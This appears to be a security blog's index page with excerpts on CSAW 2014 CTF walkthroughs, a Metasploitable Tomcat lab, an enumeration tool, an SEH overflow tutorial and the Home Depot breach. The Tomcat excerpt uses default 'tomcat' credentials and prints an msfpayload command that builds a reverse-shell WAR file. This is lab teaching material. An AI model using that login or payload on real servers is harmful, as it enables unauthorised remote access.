CSAW 2014 walkthrough – Fluffy No More

Fluffy No More was a Forensics 300 point challenge at CSAW 2014. The backstory seemed kind of funny and I thought I’d give it a shot!

fluffy no more challenge

Setup

The attached tarball contained a few additional tarballs:

  • Full /etc directory contents
  • Full /var/log directory contents
  • Full /var/www directory contents
  • A MySQL database dump file

The task was to determine the attacker’s ingress point as well as discover a key for the CTF challenge. I cover both points in the sections below.

CSAW 2014 walkthrough – pybabbies

pybabbies was an Exploitation 200 challenge during the CTF and I got “voluntold” to work on this one by my team mates since I have a strong Python background. The night was young and I felt pretty good about it, so I took a look.

pybabbies challenge

Setting the scene

Connecting to that IP/port with netcat revealed a shell prompt indicating that I had connected to a Python sandbox environment. Python sandboxes are nothing new, and I had actually recently done some reading on a sandbox challenge from an older CTF writeup so I felt pretty good about what I was getting myself in to.

Metasploitable Series – Tomcat

In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.

Lets start with a Nmap scan…

1409539753_thumb.png
So we can see on port 8180 we have Tomcat running…  Lets take a look at it…

As we can see the Tomcat manager requires a login.  I know that by default the username and password is ‘tomcat’ lets try that.

we have logged into the manager application!  Lets now take a look at generating a reverse shell!

msfpayload linux/x86/shell_reverse_tcp RHOST=172.16.28.245 LPORT=4444 W > myshell.war

Enumerator PIP install is live

Great news! After collaborating with felux(@sugarstackio) of http://sugarstack.io  in #overflowsec. Im excited that enumerator is now a pip install within python! Woohoo!

More information can be obtained at Enumerator PIP. Give it a once over, its an easy install now.

Thanks felux for all of the hard work, the project is coming along great. Look for more updates in the future.

Simple Buffer Overflow bypassing SEH

Here recently, I have gotten more interested in exploit writing, and the entire process of it. Being that I am noob to this, I obviously started my quest by looking for tutorials. Unfortunately I wasn’t able to find the “Explain like I’m 5” tutorial that I needed, and the entire process took me much longer than anticipated. Now that I finally got it figured out, I wanted to share with the world! 😀

Home Depot Data Breach

Details are still not clear, but at this point we do suspect there has been a large data breach at The Home Depot.  There is no reason to believe only some stores were effected, and chances are the breach is spread across the companies 2,000+ stores.

Banks are saying they have seen “suspicious” activity so far dating back to April of 2014.  If that is the case, we need to think of the impact this could have.  If you remember back, Target had only been breached for 2-3 weeks and leaked some 40 million credit and debt cards.

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members employers.